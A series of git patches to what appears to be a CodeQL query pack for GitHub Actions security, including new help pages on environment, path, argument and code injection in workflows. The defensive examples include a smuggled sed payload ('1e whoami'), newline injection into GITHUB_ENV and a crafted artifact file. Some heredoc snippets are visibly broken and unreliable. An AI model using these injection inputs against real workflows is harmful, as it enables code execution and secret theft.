@@ -153,6 +156,7 @@ edges | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | From 8ebe76668cd59844966e20cb7626f763545c4ee8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 17:24:59 +0200 Subject: [PATCH 465/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0d53b48ef113..d9889fb08694 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.35 +version: 0.1.36 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ade19bd63ee7..9b4795a0d8a4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.35 +version: 0.1.36 groups: [actions, queries] suites: codeql-suites extractor: javascript From f4f18f38ccb4cf89865dce475526bf143a37e800 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:04:32 +0200 Subject: [PATCH 466/707] Move Argument injection queries to its own CWE --- .../{CWE-094 => CWE-088}/ArgumentInjectionCritical.ql | 4 +--- .../Security/{CWE-094 => CWE-088}/ArgumentInjectionMedium.ql | 4 +--- .../{CWE-094 => CWE-088}/.github/workflows/arg_injection.yml | 0 .../{CWE-094 => CWE-088}/ArgumentInjectionCritical.expected | 0 .../Security/CWE-088/ArgumentInjectionCritical.qlref | 1 + .../{CWE-094 => CWE-088}/ArgumentInjectionMedium.expected | 0 .../Security/CWE-088/ArgumentInjectionMedium.qlref | 1 + .../Security/CWE-094/ArgumentInjectionCritical.qlref | 1 - .../Security/CWE-094/ArgumentInjectionMedium.qlref | 1 - 9 files changed, 4 insertions(+), 8 deletions(-) rename ql/src/Security/{CWE-094 => CWE-088}/ArgumentInjectionCritical.ql (89%) rename ql/src/Security/{CWE-094 => CWE-088}/ArgumentInjectionMedium.ql (89%) rename ql/test/query-tests/Security/{CWE-094 => CWE-088}/.github/workflows/arg_injection.yml (100%) rename ql/test/query-tests/Security/{CWE-094 => CWE-088}/ArgumentInjectionCritical.expected (100%) create mode 100644 ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref rename ql/test/query-tests/Security/{CWE-094 => CWE-088}/ArgumentInjectionMedium.expected (100%) create mode 100644 ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref diff --git a/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql similarity index 89% rename from ql/src/Security/CWE-094/ArgumentInjectionCritical.ql rename to ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index e56f613fac4f..affa372f14eb 100644 --- a/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql 
@@ -8,9 +8,7 @@ * @id actions/argument-injection/critical * @tags actions * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 + * external/cwe/cwe-088 */ import actions diff --git a/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql similarity index 89% rename from ql/src/Security/CWE-094/ArgumentInjectionMedium.ql rename to ql/src/Security/CWE-088/ArgumentInjectionMedium.ql index 66c51ae36738..fa5b750fd892 100644 --- a/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql @@ -8,9 +8,7 @@ * @id actions/argument-injection/medium * @tags actions * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 + * external/cwe/cwe-088 */ import actions diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml rename to ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected rename to ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref new file mode 100644 index 000000000000..e36c9c6f3e82 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-088/ArgumentInjectionCritical.ql 
diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected rename to ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref new file mode 100644 index 000000000000..afc26233870a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-088/ArgumentInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref deleted file mode 100644 index 6b3e2fd9f629..000000000000 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/ArgumentInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref deleted file mode 100644 index b9c4ae95e43a..000000000000 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/ArgumentInjectionMedium.ql From 9977f25f0f4ac6d990aca4eb3423a94e48bfe244 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:05:17 +0200 Subject: [PATCH 467/707] Move some queries to experimental --- ql/src/Security/CWE-078/CommandInjectionCritical.ql | 1 + ql/src/Security/CWE-078/CommandInjectionMedium.ql | 1 + ql/src/Security/CWE-200/SecretExfiltration.ql | 1 + ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql | 3 +-- ql/src/Security/CWE-918/RequestForgery.ql | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) 
diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index 689424782842..f5a4aed3eca0 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -9,6 +9,7 @@ * @id actions/command-injection/critical * @tags actions * security + * experimental * external/cwe/cwe-078 */ diff --git a/ql/src/Security/CWE-078/CommandInjectionMedium.ql b/ql/src/Security/CWE-078/CommandInjectionMedium.ql index 5feacedc40bf..8e7d72dded93 100644 --- a/ql/src/Security/CWE-078/CommandInjectionMedium.ql +++ b/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -9,6 +9,7 @@ * @id actions/command-injection/medium * @tags actions * security + * experimental * external/cwe/cwe-078 */ diff --git a/ql/src/Security/CWE-200/SecretExfiltration.ql b/ql/src/Security/CWE-200/SecretExfiltration.ql index a6d1c18b733a..2e583a989893 100644 --- a/ql/src/Security/CWE-200/SecretExfiltration.ql +++ b/ql/src/Security/CWE-200/SecretExfiltration.ql @@ -8,6 +8,7 @@ * @id actions/secret-exfiltration * @tags actions * security + * experimental * external/cwe/cwe-200 */ diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index b32fe4068772..9610302d1c2a 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -8,9 +8,8 @@ * @id actions/pr-on-self-hosted-runner * @tags actions * security - * external/cwe/cwe-284 - * testing * experimental + * external/cwe/cwe-284 */ import codeql.actions.security.SelfHostedQuery diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 3700201c3152..9721d666bd45 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql 
@@ -8,6 +8,7 @@ * @id actions/request-forgery * @tags actions * security + * experimental * external/cwe/cwe-918 */ From d8df3ff6b3ca33598e2968b015cd318587fa46b9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:05:41 +0200 Subject: [PATCH 468/707] Use ControlCheck.dominates in the ImproperAccessControl query --- ql/src/Security/CWE-285/ImproperAccessControl.ql | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 3fc94d1aa22d..2c7882604b27 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -20,11 +20,6 @@ where job.getATriggerEvent() = event and event.getName() = "pull_request_target" and event.getAnActivityType() = "synchronize" and - job.getAStep() = checkout and - ( - checkout.getIf() = check - or - checkout.getEnclosingJob().getIf() = check - ) -select checkout, "The checked-out code can be changed after the authorization check o step $@.", - check, check.toString() + check.dominates(checkout) +select checkout, "The checked-out code can be modified after the authorization check $@.", check, + check.toString() From 9411fac4d02de6af4214f4d1f983d99bce815d24 Mon Sep 17 00:00:00 2001 
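Review bot: Dropping `job.getAStep() = checkout` removes the only conjunct that tied `checkout` to `job`; after this change the `pull_request_target`/`synchronize` trigger is tested on `job` while `checkout` is constrained only by `check.dominates(checkout)`, so unless `dominates` implies that both nodes belong to the same job, a checkout step in an unrelated job or workflow could be reported against this job's trigger. Keeping the link is a one-line change, `check.dominates(checkout) and checkout.getEnclosingJob() = job`, or simply restoring `job.getAStep() = checkout and`. If `dominates` already guarantees same-job membership, a comment stating so would spare the next reader the same question. The `from`/`where` clause starts before this hunk.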
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:06:06 +0200 Subject: [PATCH 469/707] New Descriptions --- .../CWE-077/EnvPathInjectionCritical.md | 37 ++++ .../CWE-077/EnvPathInjectionMedium.md | 37 ++++ .../CWE-077/EnvVarInjectionCritical.md | 117 ++++++++++++ .../Security/CWE-077/EnvVarInjectionMedium.md | 117 ++++++++++++ .../CWE-088/ArgumentInjectionCritical.md | 41 +++++ .../CWE-088/ArgumentInjectionMedium.md | 41 +++++ .../Security/CWE-094/CodeInjectionCritical.md | 26 ++- .../Security/CWE-094/CodeInjectionMedium.md | 26 ++- .../CWE-1395/UseOfKnownVulnerableAction.md | 13 ++ .../CWE-275/MissingActionsPermissions.md | 17 +- .../Security/CWE-285/ImproperAccessControl.md | 57 ++++++ .../CWE-312/ExcessiveSecretsExposure.md | 52 ++++++ .../CWE-312/UnmaskedSecretExposure.md | 37 ++++ .../CWE-349/CachePoisoningViaCodeInjection.md | 83 +++++++++ .../CWE-349/CachePoisoningViaDirectCache.md | 101 +++++++++++ .../CachePoisoningViaPoisonableStep.md | 85 +++++++++ .../UntrustedCheckoutTOCTOUCritical.md | 168 ++++++++++++++++++ .../CWE-367/UntrustedCheckoutTOCTOUMedium.md | 168 ++++++++++++++++++ .../CWE-571/ExpressionIsAlwaysTrue.md | 63 +++++++ .../CWE-829/ArtifactPoisoningCritical.md | 72 ++++++++ .../CWE-829/ArtifactPoisoningMedium.md | 72 ++++++++ ql/src/Security/CWE-829/UnpinnedActionsTag.md | 27 +++ .../CWE-829/UntrustedCheckoutCritical.md | 137 ++++++++++++++ .../Security/CWE-829/UntrustedCheckoutHigh.md | 137 ++++++++++++++ .../CWE-829/UntrustedCheckoutMedium.md | 137 ++++++++++++++ 25 files changed, 1860 insertions(+), 8 deletions(-) create mode 100644 ql/src/Security/CWE-077/EnvPathInjectionCritical.md create mode 100644 ql/src/Security/CWE-077/EnvPathInjectionMedium.md create mode 100644 ql/src/Security/CWE-077/EnvVarInjectionCritical.md create mode 100644 ql/src/Security/CWE-077/EnvVarInjectionMedium.md create mode 100644 ql/src/Security/CWE-088/ArgumentInjectionCritical.md create mode 100644 ql/src/Security/CWE-088/ArgumentInjectionMedium.md 
create mode 100644 ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md create mode 100644 ql/src/Security/CWE-285/ImproperAccessControl.md create mode 100644 ql/src/Security/CWE-312/ExcessiveSecretsExposure.md create mode 100644 ql/src/Security/CWE-312/UnmaskedSecretExposure.md create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoningCritical.md create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoningMedium.md create mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutCritical.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutHigh.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutMedium.md diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md new file mode 100644 index 000000000000..1891d41fa394 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md 
@@ -0,0 +1,37 @@ +# Environment Path Injection + +## Description + +GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. + +```bash +echo "$HOME/.local/bin" >> $GITHUB_PATH +``` + +If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. + +## Recommendations + +- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. + +## Examples + +### Incorrect Usage + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the path + env: + BODY: ${{ github.event.comment.body }} + run: | + PATH=$(echo "$BODY" | grep -oP 'system path: \K\S+') + echo "$PATH" >> "$GITHUB_PATH" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially change the system PATH and get arbitrary command execution in subsequent steps. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md new file mode 100644 index 000000000000..1891d41fa394 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md 
@@ -0,0 +1,37 @@
+# Environment Path Injection
+
+## Description
+
+GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g.
+
+```bash
+echo "$HOME/.local/bin" >> $GITHUB_PATH
+```
+
+If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job.
+
+## Recommendations
+
+- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH.
+
+## Examples
+
+### Incorrect Usage
+
+Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps:
+
+```yaml
+steps:
+ - name: Set the path
+ env:
+ BODY: ${{ github.event.comment.body }}
+ run: |
+ PATH=$(echo "$BODY" | grep -oP 'system path: \K\S+')
+ echo "$PATH" >> "$GITHUB_PATH"
+```
+
+If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially change the system PATH and get arbitrary command execution in subsequent steps.
+
+## References
+
+- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions)
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md
new file mode 100644
index 000000000000..1d33a014d4b4
--- /dev/null
+++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md
@@ -0,0 +1,117 @@ +# Environment Variable Injection + +## Description + +GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: + +This file should lines in the `KEY=VALUE` format: + +```bash +steps: + - name: Set the value + id: step_one + run: | + echo "action_state=yellow" >> "$GITHUB_ENV" +``` + +It is also possible to define a multiline variables by using the following format: + +``` +KEY<<{delimiter} +VALUE +VALUE +{delimiter} +``` + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" +``` + +If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. + +## Recommendations + +1. **Do Not Allow Untrusted Data to Influence Environment Variables**: + +- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. +- Validate and sanitize all inputs before using them in environment settings. + +2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: + +- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + +3. 
**Use Unique Identifiers When Defining Multi Line Environment Variables**: + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" +``` + +## Examples + +### Example of Vulnerability + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the value + id: step_one + env: + BODY: ${{ github.event.comment.body }} + run: | + REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') + echo "BODY=$REPLACED" >> "$GITHUB_ENV" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: + +``` +FOO +NEW_ENV_VAR=MALICIOUS_VALUE +``` + +Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: + +```bash +- run: | + PR_NUMBER=$(cat pr-number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV +``` + +An attacker could craft a malicious artifact that writes dangerous environment variables: + +```bash + - run: | + echo -e "666\nNEW_ENV_VAR=MALICIOUS_VALUE" > pr-number.txt + - uses: actions/upload-artifact@v4 + with: + name: pr-number + path: ./pr-number.txt +``` + +### Exploitation + +An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) +- [GitHub Actions Exploitation: Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation) 
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md new file mode 100644 index 000000000000..1d33a014d4b4 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md 
@@ -0,0 +1,117 @@ +# Environment Variable Injection + +## Description + +GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: + +This file should lines in the `KEY=VALUE` format: + +```bash +steps: + - name: Set the value + id: step_one + run: | + echo "action_state=yellow" >> "$GITHUB_ENV" +``` + +It is also possible to define a multiline variables by using the following format: + +``` +KEY<<{delimiter} +VALUE +VALUE +{delimiter} +``` + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" +``` + +If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. + +## Recommendations + +1. **Do Not Allow Untrusted Data to Influence Environment Variables**: + +- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. +- Validate and sanitize all inputs before using them in environment settings. + +2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: + +- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + +3. 
**Use Unique Identifiers When Defining Multi Line Environment Variables**: + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" +``` + +## Examples + +### Example of Vulnerability + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the value + id: step_one + env: + BODY: ${{ github.event.comment.body }} + run: | + REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') + echo "BODY=$REPLACED" >> "$GITHUB_ENV" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: + +``` +FOO +NEW_ENV_VAR=MALICIOUS_VALUE +``` + +Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: + +```bash +- run: | + PR_NUMBER=$(cat pr-number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV +``` + +An attacker could craft a malicious artifact that writes dangerous environment variables: + +```bash + - run: | + echo -e "666\nNEW_ENV_VAR=MALICIOUS_VALUE" > pr-number.txt + - uses: actions/upload-artifact@v4 + with: + name: pr-number + path: ./pr-number.txt +``` + +### Exploitation + +An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) +- [GitHub Actions Exploitation: Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation) 
diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md
new file mode 100644
index 000000000000..00dc3bad472b
--- /dev/null
+++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md
@@ -0,0 +1,41 @@
+# Argument Injection in GitHub Actions
+
+## Description
+
+Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution.
+
+Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository.
+
+## Recommendations
+
+When possible avoid passing user-controlled data to commands which may spawn new processes using some of their arguments.
+
+It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN.
+
+## Examples
+
+### Incorrect Usage
+
+The following example lets a user inject an arbitrary shell command through argument injection:
+
+```yaml
+on: issue_comment
+
+jobs:
+ echo-body:
+ runs-on: ubuntu-latest
+ steps:
+ - env:
+ BODY: ${{ github.event.comment.body }}
+ run: |
+ cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt
+```
+
+An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation.
+
+## References
+
+- [Common Weakness Enumeration: CWE-88](https://cwe.mitre.org/data/definitions/88.html).
+- [Argument Injection Explained](https://sonarsource.github.io/argument-injection-vectors/explained/)
+- [Argument Injection Vectors](https://sonarsource.github.io/argument-injection-vectors/)
+- [GTFOBins](https://gtfobins.github.io/)
diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md
new file mode 100644
index 000000000000..00dc3bad472b
--- /dev/null
+++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md
@@ -0,0 +1,41 @@
+# Argument Injection in GitHub Actions
+
+## Description
+
+Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution.
+
+Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository.
+
+## Recommendations
+
+When possible avoid passing user-controlled data to commands which may spawn new processes using some of their arguments.
+
+It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN.
+
+## Examples
+
+### Incorrect Usage
+
+The following example lets a user inject an arbitrary shell command through argument injection:
+
+```yaml
+on: issue_comment
+
+jobs:
+ echo-body:
+ runs-on: ubuntu-latest
+ steps:
+ - env:
+ BODY: ${{ github.event.comment.body }}
+ run: |
+ cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt
+```
+
+An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation.
+
+## References
+
+- [Common Weakness Enumeration: CWE-88](https://cwe.mitre.org/data/definitions/88.html).
+- [Argument Injection Explained](https://sonarsource.github.io/argument-injection-vectors/explained/)
+- [Argument Injection Vectors](https://sonarsource.github.io/argument-injection-vectors/)
+- [GTFOBins](https://gtfobins.github.io/)
diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/ql/src/Security/CWE-094/CodeInjectionCritical.md
index 9939c88eb19a..cc85f68fb0d2 100644
--- a/ql/src/Security/CWE-094/CodeInjectionCritical.md +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.md @@ -1,16 +1,20 @@ # Code Injection in GitHub Actions +## Description + Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. -## Recommendation +## Recommendations The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. -## Example +## Examples + +### Incorrect Usage The following example lets a user inject an arbitrary shell command: @@ -40,6 +44,8 @@ jobs: echo '${{ env.BODY }}' ``` +### Correct Usage + The following example uses shell syntax to read the environment variable and will prevent the attack: ```yaml @@ -53,6 +59,22 @@ jobs: echo "$BODY" ``` +The following example uses `process.env` to read environment variables within JavaScript code. + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - uses: uses: actions/github-script@v4 + env: + BODY: ${{ github.event.issue.body }} + with: + script: | + const { BODY } = process.env + ... +``` + ## References - GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). 
